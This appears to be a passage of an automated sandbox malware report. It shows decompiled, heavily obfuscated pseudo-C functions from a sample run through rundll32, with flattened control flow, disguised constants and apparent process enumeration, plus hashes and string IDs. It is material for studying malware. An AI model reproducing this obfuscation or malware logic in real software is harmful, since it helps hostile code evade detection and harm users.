                                                                                                                      				_v60 = 0x688185;
                                                                                                                      				_t381 =  &(( &_v116)[4]);
                                                                                                                      				_v60 = _v60 ^ 0x6a5ee641;
                                                                                                                      				_t6 =  &_v60; // 0x6a5ee641
                                                                                                                      				_t365 = 0;
                                                                                                                      				_t330 = 0xb7d839b;
                                                                                                                      				_t368 = 0x77;
                                                                                                                      				_v60 =  *_t6 * 0x53;
                                                                                                                      				_v60 = _v60 ^ 0x6fa3a48d;
                                                                                                                      				_v36 = 0x2ce9a9;
                                                                                                                      				_v36 = _v36 / _t368;
                                                                                                                      				_v36 = _v36 ^ 0x0000609f;
                                                                                                                      				_v72 = 0x8d05d4;
                                                                                                                      				_v72 = _v72 + 0xfffff9ae;
                                                                                                                      				_v72 = _v72 + 0xfffffb99;
                                                                                                                      				_v72 = _v72 + 0xffff1821;
                                                                                                                      				_v72 = _v72 ^ 0x008c133c;
                                                                                                                      				_v84 = 0xdf93a7;
                                                                                                                      				_v84 = _v84 + 0x158a;
                                                                                                                      				_v84 = _v84 | 0xa6edaf65;
                                                                                                                      				_v84 = _v84 ^ 0xa6ffaf75;
                                                                                                                      				_v16 = 0x181fb2;
                                                                                                                      				_v16 = _v16 >> 0xb;
                                                                                                                      				_v16 = _v16 ^ 0x00000303;
                                                                                                                      				_v40 = 0xf7fe46;
                                                                                                                      				_v40 = _v40 >> 4;
                                                                                                                      				_v40 = _v40 ^ 0x000f7fe4;
                                                                                                                      				_v96 = 0x7307ab;
                                                                                                                      				_v96 = _v96 + 0xffff98a0;
                                                                                                                      				_v96 = _v96 ^ 0x207b23a6;
                                                                                                                      				_t369 = 7;
                                                                                                                      				_v96 = _v96 / _t369;
                                                                                                                      				_v96 = _v96 ^ 0x0493a521;
                                                                                                                      				_v68 = 0xb0f7c2;
                                                                                                                      				_v68 = _v68 + 0xa001;
                                                                                                                      				_v68 = _v68 + 0xf927;
                                                                                                                      				_t370 = 0x1b;
                                                                                                                      				_v68 = _v68 / _t370;
                                                                                                                      				_v68 = _v68 ^ 0x0001298b;
                                                                                                                      				_v20 = 0x9a8fe8;
                                                                                                                      				_v20 = _v20 >> 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x0008eae3;
                                                                                                                      				_v76 = 0xc447f;
                                                                                                                      				_v76 = _v76 << 2;
                                                                                                                      				_v76 = _v76 ^ 0x6da7c905;
                                                                                                                      				_v76 = _v76 | 0x8e440162;
                                                                                                                      				_v76 = _v76 ^ 0xefde5c32;
                                                                                                                      				_v80 = 0xe5293a;
                                                                                                                      				_v80 = _v80 ^ 0x7ea2fbd4;
                                                                                                                      				_v80 = _v80 << 6;
                                                                                                                      				_v80 = _v80 >> 0x10;
                                                                                                                      				_v80 = _v80 ^ 0x000bb464;
                                                                                                                      				_v24 = 0xaea513;
                                                                                                                      				_v24 = _v24 ^ 0xb7e1a43c;
                                                                                                                      				_v24 = _v24 ^ 0xb74b462d;
                                                                                                                      				_v28 = 0x6b2191;
                                                                                                                      				_v28 = _v28 | 0x9c0eb3e2;
                                                                                                                      				_v28 = _v28 ^ 0x9c639c10;
                                                                                                                      				_v32 = 0x4e8823;
                                                                                                                      				_t371 = 0xe;
                                                                                                                      				_v32 = _v32 / _t371;
                                                                                                                      				_v32 = _v32 ^ 0x000823cf;
                                                                                                                      				_v88 = 0x8b37c7;
                                                                                                                      				_v88 = _v88 + 0x96e4;
                                                                                                                      				_t372 = 0x63;
                                                                                                                      				_v88 = _v88 / _t372;
                                                                                                                      				_t373 = 0x18;
                                                                                                                      				_v88 = _v88 / _t373;
                                                                                                                      				_v88 = _v88 ^ 0x000cd8d0;
                                                                                                                      				_v92 = 0x8ccaf;
                                                                                                                      				_v92 = _v92 + 0xffff7c77;
                                                                                                                      				_v92 = _v92 >> 7;
                                                                                                                      				_t374 = 0x1a;
                                                                                                                      				_v92 = _v92 * 0x4a;
                                                                                                                      				_v92 = _v92 ^ 0x000ee576;
                                                                                                                      				_v100 = 0x6d8220;
                                                                                                                      				_v100 = _v100 + 0xffffba59;
                                                                                                                      				_v100 = _v100 / _t374;
                                                                                                                      				_v100 = _v100 + 0x20d5;
                                                                                                                      				_v100 = _v100 ^ 0x000e9a10;
                                                                                                                      				_v104 = 0xccaba6;
                                                                                                                      				_t375 = 0x29;
                                                                                                                      				_v104 = _v104 / _t375;
                                                                                                                      				_t376 = 0x69;
                                                                                                                      				_v104 = _v104 / _t376;
                                                                                                                      				_v104 = _v104 + 0xffff1a57;
                                                                                                                      				_v104 = _v104 ^ 0xfff2229f;
                                                                                                                      				_v44 = 0x73a08b;
                                                                                                                      				_v44 = _v44 / _t376;
                                                                                                                      				_v44 = _v44 ^ 0x0004e5c5;
                                                                                                                      				_v108 = 0xb1e3bd;
                                                                                                                      				_v108 = _v108 ^ 0x0f8130c9;
                                                                                                                      				_v108 = _v108 + 0x5ac4;
                                                                                                                      				_t377 = 0x21;
                                                                                                                      				_v108 = _v108 / _t377;
                                                                                                                      				_v108 = _v108 ^ 0x0077ef5a;
                                                                                                                      				_v112 = 0x4cec76;
                                                                                                                      				_t192 =  &_v112; // 0x4cec76
                                                                                                                      				_v112 =  *_t192 * 0x1a;
                                                                                                                      				_v112 = _v112 + 0xdd93;
                                                                                                                      				_v112 = _v112 << 6;
                                                                                                                      				_v112 = _v112 ^ 0xf432eb29;
                                                                                                                      				_v116 = 0x879801;
                                                                                                                      				_v116 = _v116 + 0x9229;
                                                                                                                      				_v116 = _v116 << 3;
                                                                                                                      				_v116 = _v116 | 0xee96daec;
                                                                                                                      				_v116 = _v116 ^ 0xeed13984;
                                                                                                                      				_v64 = 0x9b79ce;
                                                                                                                      				_v64 = _v64 >> 0xe;
                                                                                                                      				_t378 = 0x5f;
                                                                                                                      				_v64 = _v64 * 0x1e;
                                                                                                                      				_v64 = _v64 | 0xf7dc9e8a;
                                                                                                                      				_v64 = _v64 ^ 0xf7d2a70d;
                                                                                                                      				_v48 = 0x898fb;
                                                                                                                      				_v48 = _v48 << 0xa;
                                                                                                                      				_v48 = _v48 * 0x4f;
                                                                                                                      				_v48 = _v48 ^ 0x9cd9bf24;
                                                                                                                      				_v52 = 0xd43737;
                                                                                                                      				_v52 = _v52 << 9;
                                                                                                                      				_v52 = _v52 / _t378;
                                                                                                                      				_v52 = _v52 ^ 0x01c68cd1;
                                                                                                                      				_v56 = 0x1c405f;
                                                                                                                      				_v56 = _v56 >> 0xa;
                                                                                                                      				_v56 = _v56 | 0xb1ef7bec;
                                                                                                                      				_v56 = _v56 ^ 0xb1edddf2;
                                                                                                                      				do {
                                                                                                                      					while(_t330 != 0x6ea4fc1) {
                                                                                                                      						if(_t330 == 0x7f0f713) {
                                                                                                                      							_push(_t330);
                                                                                                                      							_push(_t330);
                                                                                                                      							_t320 = E00183512(_v8);
                                                                                                                      							_v12 = _t320;
                                                                                                                      							if(_t320 != 0) {
                                                                                                                      								_t330 = 0xa80f622;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t330 == 0x7f61550) {
                                                                                                                      								E001768DE(_v64, _v48, _v52, _v56, _v12);
                                                                                                                      							} else {
                                                                                                                      								if(_t330 == 0xa80f622) {
                                                                                                                      									_t324 =  *0x195c9c; // 0x0
                                                                                                                      									_t325 = E0017B335(_v100,  *_t367, _v104,  *((intOrPtr*)(_t324 + 0x50)), _v36, _t330, _v40,  &_v8, _v44,  *((intOrPtr*)(_t367 + 4)), _v108, _v112, _v12, _v116, _t330, _v8);
                                                                                                                      									_t381 =  &(_t381[0xe]);
                                                                                                                      									if(_t325 == _v96) {
                                                                                                                      										 *_t328 = _v12;
                                                                                                                      										_t365 = 1;
                                                                                                                      										 *((intOrPtr*)(_t328 + 4)) = _v8;
                                                                                                                      									} else {
                                                                                                                      										_t330 = 0x7f61550;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t330 != 0xb7d839b) {
                                                                                                                      										goto L14;
                                                                                                                      									} else {
                                                                                                                      										_t330 = 0x6ea4fc1;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L18:
                                                                                                                      						return _t365;
                                                                                                                      					}
                                                                                                                      					_t315 =  *0x195c9c; // 0x0
                                                                                                                      					_t316 = E0017B335(_v68,  *_t367, _v20,  *((intOrPtr*)(_t315 + 0x50)), _v60, _t330, _v72,  &_v8, _v76,  *((intOrPtr*)(_t367 + 4)), _v80, _v24, _t365, _v28, _t330, _v84);
                                                                                                                      					_t381 =  &(_t381[0xe]);
                                                                                                                      					if(_t316 != _v16) {
                                                                                                                      						_t330 = 0x33d9eeb;
                                                                                                                      						goto L14;
                                                                                                                      					} else {
                                                                                                                      						_t330 = 0x7f0f713;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L14:
                                                                                                                      				} while (_t330 != 0x33d9eeb);
                                                                                                                      				goto L18;
                                                                                                                      			}






















































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :)$A^j$Zw$vL
                                                                                                                      • API String ID: 0-3297297485
                                                                                                                      • Opcode ID: 24cfc3d01645b0720ccf1c3eb751546217551c5519edba5b0b30b6e4f529f1db
                                                                                                                      • Instruction ID: ebe9543afd2d6bc4402c79385e4c982936ee3470b2d849d4c8f647c29c7f07ce
                                                                                                                      • Opcode Fuzzy Hash: 24cfc3d01645b0720ccf1c3eb751546217551c5519edba5b0b30b6e4f529f1db
                                                                                                                      • Instruction Fuzzy Hash: 59D130B25083419FD768CF66D98991BFBE2FBC4748F10891DF295862A0C7B69949CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E0018A156(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				intOrPtr _v136;
                                                                                                                      				char _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				void* _t133;
                                                                                                                      				signed int _t146;
                                                                                                                      				void* _t147;
                                                                                                                      				void* _t155;
                                                                                                                      				char* _t156;
                                                                                                                      				void* _t174;
                                                                                                                      				signed int _t175;
                                                                                                                      				signed int _t176;
                                                                                                                      				signed int _t177;
                                                                                                                      				signed int _t178;
                                                                                                                      				signed int* _t183;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t174 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t133);
                                                                                                                      				_v132 = _v132 & 0x00000000;
                                                                                                                      				_t183 =  &(( &_v196)[5]);
                                                                                                                      				_v136 = 0x446ea7;
                                                                                                                      				_v180 = 0x28766d;
                                                                                                                      				_t155 = 0x8ee0430;
                                                                                                                      				_v180 = _v180 | 0x8061b26e;
                                                                                                                      				_t175 = 0x7a;
                                                                                                                      				_v180 = _v180 / _t175;
                                                                                                                      				_v180 = _v180 ^ 0x0107c2a1;
                                                                                                                      				_v160 = 0x181348;
                                                                                                                      				_t176 = 0x24;
                                                                                                                      				_v160 = _v160 / _t176;
                                                                                                                      				_v160 = _v160 ^ 0x00002248;
                                                                                                                      				_v192 = 0xf13979;
                                                                                                                      				_v192 = _v192 + 0xffff8439;
                                                                                                                      				_v192 = _v192 << 0xb;
                                                                                                                      				_v192 = _v192 + 0x337f;
                                                                                                                      				_v192 = _v192 ^ 0x85ec5d3f;
                                                                                                                      				_v148 = 0x5e6289;
                                                                                                                      				_v148 = _v148 >> 5;
                                                                                                                      				_v148 = _v148 ^ 0x00022a63;
                                                                                                                      				_v184 = 0xe3b806;
                                                                                                                      				_v184 = _v184 + 0xc2d8;
                                                                                                                      				_v184 = _v184 | 0x759fad77;
                                                                                                                      				_v184 = _v184 ^ 0x75f287c1;
                                                                                                                      				_v168 = 0x566c5d;
                                                                                                                      				_v168 = _v168 ^ 0x750ff463;
                                                                                                                      				_v168 = _v168 ^ 0x75584e2a;
                                                                                                                      				_v152 = 0x83e247;
                                                                                                                      				_v152 = _v152 ^ 0x81f90c1d;
                                                                                                                      				_v152 = _v152 ^ 0x81706586;
                                                                                                                      				_v188 = 0x5c5a6b;
                                                                                                                      				_v188 = _v188 >> 9;
                                                                                                                      				_v188 = _v188 << 0xb;
                                                                                                                      				_v188 = _v188 >> 0xf;
                                                                                                                      				_v188 = _v188 ^ 0x00030e37;
                                                                                                                      				_v176 = 0xc154a1;
                                                                                                                      				_v176 = _v176 | 0xc3f8b8be;
                                                                                                                      				_t177 = 0x3c;
                                                                                                                      				_v176 = _v176 * 0x16;
                                                                                                                      				_v176 = _v176 ^ 0xd77414a9;
                                                                                                                      				_v164 = 0x5dd26c;
                                                                                                                      				_v164 = _v164 * 0x18;
                                                                                                                      				_v164 = _v164 ^ 0x08c2b6d4;
                                                                                                                      				_v144 = 0x980588;
                                                                                                                      				_v144 = _v144 << 3;
                                                                                                                      				_v144 = _v144 ^ 0x04c0143e;
                                                                                                                      				_v196 = 0xd24b78;
                                                                                                                      				_v196 = _v196 * 0xf;
                                                                                                                      				_v196 = _v196 * 7;
                                                                                                                      				_v196 = _v196 / _t177;
                                                                                                                      				_v196 = _v196 ^ 0x017222e8;
                                                                                                                      				_v156 = 0x8c94fd;
                                                                                                                      				_v156 = _v156 + 0xffff8671;
                                                                                                                      				_v156 = _v156 ^ 0x0082913e;
                                                                                                                      				_v172 = 0x17d6e;
                                                                                                                      				_t178 = 0x63;
                                                                                                                      				_t146 = _v172 / _t178;
                                                                                                                      				_v172 = _t146;
                                                                                                                      				_v172 = _v172 + 0x20ae;
                                                                                                                      				_v172 = _v172 ^ 0x00044ed7;
                                                                                                                      				do {
                                                                                                                      					while(_t155 != 0x2e9bf4f) {
                                                                                                                      						if(_t155 == 0x570f58c) {
                                                                                                                      							_push(0x171494);
                                                                                                                      							_push(_v168);
                                                                                                                      							_t147 = E0017BB4B(_v148, _v184, __eflags);
                                                                                                                      							E0018D1C1(__eflags, _t174, _v188, _v176, _t147, E0017F154(__eflags), _v164, _v144);
                                                                                                                      							return E0017AE03(_v196, _v156, _v172, _t147);
                                                                                                                      						}
                                                                                                                      						if(_t155 == 0x8ee0430) {
                                                                                                                      							_t155 = 0xffbee7a;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t155 != 0xffbee7a) {
                                                                                                                      							goto L17;
                                                                                                                      						}
                                                                                                                      						_v140 = 0x80;
                                                                                                                      						_t146 = E00183F73(_v180, _v160,  &_v140, _v192,  &_v128);
                                                                                                                      						_t183 =  &(_t183[3]);
                                                                                                                      						_t155 = 0x2e9bf4f;
                                                                                                                      					}
                                                                                                                      					__eflags = _v128;
                                                                                                                      					_t156 =  &_v128;
                                                                                                                      					if(_v128 == 0) {
                                                                                                                      						L16:
                                                                                                                      						_t155 = 0x570f58c;
                                                                                                                      						goto L17;
                                                                                                                      					} else {
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					do {
                                                                                                                      						L8:
                                                                                                                      						_t146 =  *_t156;
                                                                                                                      						__eflags = _t146 - 0x30;
                                                                                                                      						if(_t146 < 0x30) {
                                                                                                                      							L10:
                                                                                                                      							__eflags = _t146 - 0x61;
                                                                                                                      							if(_t146 < 0x61) {
                                                                                                                      								L12:
                                                                                                                      								__eflags = _t146 - 0x41;
                                                                                                                      								if(_t146 < 0x41) {
                                                                                                                      									L14:
                                                                                                                      									 *_t156 = 0x58;
                                                                                                                      									goto L15;
                                                                                                                      								}
                                                                                                                      								__eflags = _t146 - 0x5a;
                                                                                                                      								if(_t146 <= 0x5a) {
                                                                                                                      									goto L15;
                                                                                                                      								}
                                                                                                                      								goto L14;
                                                                                                                      							}
                                                                                                                      							__eflags = _t146 - 0x7a;
                                                                                                                      							if(_t146 <= 0x7a) {
                                                                                                                      								goto L15;
                                                                                                                      							}
                                                                                                                      							goto L12;
                                                                                                                      						}
                                                                                                                      						__eflags = _t146 - 0x39;
                                                                                                                      						if(_t146 <= 0x39) {
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						goto L10;
                                                                                                                      						L15:
                                                                                                                      						_t156 = _t156 + 1;
                                                                                                                      						__eflags =  *_t156;
                                                                                                                      					} while ( *_t156 != 0);
                                                                                                                      					goto L16;
                                                                                                                      					L17:
                                                                                                                      					__eflags = _t155 - 0x55e4d43;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t146;
                                                                                                                      			}
































                                                                                                                      0x0018a312
                                                                                                                      0x0018a31c
                                                                                                                      0x0018a334
                                                                                                                      0x0018a335
                                                                                                                      0x0018a33c
                                                                                                                      0x0018a340
                                                                                                                      0x0018a348
                                                                                                                      0x0018a350
                                                                                                                      0x0018a350
                                                                                                                      0x0018a356
                                                                                                                      0x0018a3cc
                                                                                                                      0x0018a3d1
                                                                                                                      0x0018a3dd
                                                                                                                      0x0018a404
                                                                                                                      0x00000000
                                                                                                                      0x0018a41b
                                                                                                                      0x0018a35e
                                                                                                                      0x0018a38e
                                                                                                                      0x00000000
                                                                                                                      0x0018a38e
                                                                                                                      0x0018a362
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a368
                                                                                                                      0x0018a382
                                                                                                                      0x0018a387
                                                                                                                      0x0018a38a
                                                                                                                      0x0018a38a
                                                                                                                      0x0018a392
                                                                                                                      0x0018a397
                                                                                                                      0x0018a39b
                                                                                                                      0x0018a3c0
                                                                                                                      0x0018a3c0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a39d
                                                                                                                      0x0018a39d
                                                                                                                      0x0018a39d
                                                                                                                      0x0018a39f
                                                                                                                      0x0018a3a1
                                                                                                                      0x0018a3a7
                                                                                                                      0x0018a3a7
                                                                                                                      0x0018a3a9
                                                                                                                      0x0018a3af
                                                                                                                      0x0018a3af
                                                                                                                      0x0018a3b1
                                                                                                                      0x0018a3b7
                                                                                                                      0x0018a3b7
                                                                                                                      0x00000000
                                                                                                                      0x0018a3b7
                                                                                                                      0x0018a3b3
                                                                                                                      0x0018a3b5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a3b5
                                                                                                                      0x0018a3ab
                                                                                                                      0x0018a3ad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a3ad
                                                                                                                      0x0018a3a3
                                                                                                                      0x0018a3a5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a3ba
                                                                                                                      0x0018a3ba
                                                                                                                      0x0018a3bb
                                                                                                                      0x0018a3bb
                                                                                                                      0x00000000
                                                                                                                      0x0018a3c2
                                                                                                                      0x0018a3c2
                                                                                                                      0x0018a3c2
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *NXu$H"$kZ\$mv(
                                                                                                                      • API String ID: 0-3447753402
                                                                                                                      • Opcode ID: 2f197765f0ae87ebe4456bd061b13063fd480f1776b3962b4b2e30900a17cc2c
                                                                                                                      • Instruction ID: a87f2c7709024c446236beebd70d04b61b06079844b6cd869521092c2788d0d1
                                                                                                                      • Opcode Fuzzy Hash: 2f197765f0ae87ebe4456bd061b13063fd480f1776b3962b4b2e30900a17cc2c
                                                                                                                      • Instruction Fuzzy Hash: 097174714083809BD768DE25C489A1FBBF2BFC5758F94590EF98696260C3B58A49CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0017F58F(void* __ecx, char _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v560;
                                                                                                                      				char _v624;
                                                                                                                      				signed int _v628;
                                                                                                                      				signed int _v632;
                                                                                                                      				signed int _v636;
                                                                                                                      				signed int _v640;
                                                                                                                      				signed int _v644;
                                                                                                                      				signed int _v648;
                                                                                                                      				signed int _v652;
                                                                                                                      				signed int _v656;
                                                                                                                      				signed int _v660;
                                                                                                                      				signed int _v664;
                                                                                                                      				signed int _v668;
                                                                                                                      				signed int _v672;
                                                                                                                      				signed int _v676;
                                                                                                                      				signed int _v680;
                                                                                                                      				void* _t129;
                                                                                                                      				signed int _t143;
                                                                                                                      				signed int _t144;
                                                                                                                      				void* _t151;
                                                                                                                      				signed int _t155;
                                                                                                                      				char _t173;
                                                                                                                      				signed int _t174;
                                                                                                                      				signed int _t175;
                                                                                                                      				signed int _t176;
                                                                                                                      				signed int _t177;
                                                                                                                      				signed int* _t181;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t173 = _a4;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_t173);
                                                                                                                      				_push(E00190CF5);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t129);
                                                                                                                      				_v660 = 0x8d8445;
                                                                                                                      				_t181 =  &(( &_v680)[5]);
                                                                                                                      				_t151 = 0x740f7fb;
                                                                                                                      				_t174 = 0x71;
                                                                                                                      				_v660 = _v660 / _t174;
                                                                                                                      				_v660 = _v660 ^ 0x128b90b3;
                                                                                                                      				_v660 = _v660 ^ 0x128ad02b;
                                                                                                                      				_v640 = 0x9067b5;
                                                                                                                      				_v640 = _v640 + 0x286c;
                                                                                                                      				_v640 = _v640 ^ 0x00975038;
                                                                                                                      				_v632 = 0x5011ea;
                                                                                                                      				_v632 = _v632 + 0xffff22a1;
                                                                                                                      				_v632 = _v632 ^ 0x00475e04;
                                                                                                                      				_v628 = 0xc0b5ed;
                                                                                                                      				_v628 = _v628 | 0x09c79ac0;
                                                                                                                      				_v628 = _v628 ^ 0x09cd8243;
                                                                                                                      				_v652 = 0x6be172;
                                                                                                                      				_v652 = _v652 << 0xe;
                                                                                                                      				_v652 = _v652 ^ 0xf9ae6093;
                                                                                                                      				_v652 = _v652 ^ 0x01f8093d;
                                                                                                                      				_v644 = 0xbd5efb;
                                                                                                                      				_v644 = _v644 << 3;
                                                                                                                      				_v644 = _v644 ^ 0x05e3f72f;
                                                                                                                      				_v656 = 0xc95ad0;
                                                                                                                      				_t175 = 0x15;
                                                                                                                      				_v656 = _v656 / _t175;
                                                                                                                      				_v656 = _v656 | 0xa2f71cc0;
                                                                                                                      				_v656 = _v656 ^ 0xa2f780bc;
                                                                                                                      				_v676 = 0xbb6512;
                                                                                                                      				_v676 = _v676 << 0x10;
                                                                                                                      				_v676 = _v676 ^ 0x67ff039f;
                                                                                                                      				_v676 = _v676 + 0xffff3430;
                                                                                                                      				_v676 = _v676 ^ 0x02e7c46b;
                                                                                                                      				_v636 = 0x771a54;
                                                                                                                      				_v636 = _v636 >> 0xf;
                                                                                                                      				_v636 = _v636 ^ 0x000f324c;
                                                                                                                      				_v680 = 0x44376b;
                                                                                                                      				_v680 = _v680 + 0xffff61f8;
                                                                                                                      				_v680 = _v680 + 0xffff924c;
                                                                                                                      				_v680 = _v680 << 0xc;
                                                                                                                      				_v680 = _v680 ^ 0x32b3ed2b;
                                                                                                                      				_v672 = 0x492cee;
                                                                                                                      				_v672 = _v672 | 0xff7fdef6;
                                                                                                                      				_v672 = _v672 ^ 0xff79836a;
                                                                                                                      				_v664 = 0x821e3f;
                                                                                                                      				_v664 = _v664 + 0xffff0102;
                                                                                                                      				_v664 = _v664 << 0xd;
                                                                                                                      				_v664 = _v664 ^ 0x23edf1fd;
                                                                                                                      				_v648 = 0xfa5772;
                                                                                                                      				_v648 = _v648 + 0x1fee;
                                                                                                                      				_v648 = _v648 ^ 0x00f8d439;
                                                                                                                      				_v668 = 0x765780;
                                                                                                                      				_t176 = 0x5a;
                                                                                                                      				_v668 = _v668 / _t176;
                                                                                                                      				_t177 = 0x7e;
                                                                                                                      				_t178 = _v648;
                                                                                                                      				_v668 = _v668 / _t177;
                                                                                                                      				_v668 = _v668 ^ 0x0009a212;
                                                                                                                      				L1:
                                                                                                                      				while(_t151 != 0x4c653bf) {
                                                                                                                      					if(_t151 == 0x50dca7b) {
                                                                                                                      						_v560 = 0x22c;
                                                                                                                      						_t144 = E00190296( &_v560, _v644, _t178, _v656, _v676);
                                                                                                                      						_t181 =  &(_t181[3]);
                                                                                                                      						L10:
                                                                                                                      						asm("sbb ecx, ecx");
                                                                                                                      						_t155 =  ~_t144 & 0x074f90c1;
                                                                                                                      						L8:
                                                                                                                      						_t151 = _t155 + 0x59cade0;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t151 == 0x59cade0) {
                                                                                                                      						return E00184DAD(_v672, _v664, _t178, _v648, _v668);
                                                                                                                      					}
                                                                                                                      					if(_t151 == 0x740f7fb) {
                                                                                                                      						_v624 = _t173;
                                                                                                                      						_t151 = 0x4c653bf;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t151 == 0xc1665e4) {
                                                                                                                      						_t144 = E0018E3F7(_v636, _t178,  &_v560, _v680);
                                                                                                                      						goto L10;
                                                                                                                      					}
                                                                                                                      					_t190 = _t151 - 0xcec3ea1;
                                                                                                                      					if(_t151 != 0xcec3ea1) {
                                                                                                                      						L16:
                                                                                                                      						__eflags = _t151 - 0x2876c78;
                                                                                                                      						if(__eflags != 0) {
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						return _t144;
                                                                                                                      					}
                                                                                                                      					_t144 = E00190CF5(_t151, _t190,  &_v560,  &_v624);
                                                                                                                      					asm("sbb ecx, ecx");
                                                                                                                      					_t155 =  ~_t144 & 0x0679b804;
                                                                                                                      					goto L8;
                                                                                                                      				}
                                                                                                                      				_t143 = E00173C3B(_t151, _v660);
                                                                                                                      				_t178 = _t143;
                                                                                                                      				_t181 = _t181 - 0xc + 0x10;
                                                                                                                      				__eflags = _t143 - 0xffffffff;
                                                                                                                      				if(__eflags == 0) {
                                                                                                                      					_t151 = 0x2876c78;
                                                                                                                      					goto L16;
                                                                                                                      				}
                                                                                                                      				_t151 = 0x50dca7b;
                                                                                                                      				goto L1;
                                                                                                                      			}































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: k7D$l($rk$,I
                                                                                                                      • API String ID: 0-1943337972
                                                                                                                      • Opcode ID: 32602432165a2761d564276766235f0de167f20635aaa46c92a223de1b0facdc
                                                                                                                      • Instruction ID: abdfd920f3d70f66d7d3ca62d9be3f2deee97b5cc32b93a6b8d3e4fa420b80dc
                                                                                                                      • Opcode Fuzzy Hash: 32602432165a2761d564276766235f0de167f20635aaa46c92a223de1b0facdc
                                                                                                                      • Instruction Fuzzy Hash: 9D717C715093019BC768DF24D58985FBBF1FBC4754F508A2EF69A96260D770890ACF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E00188D71(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
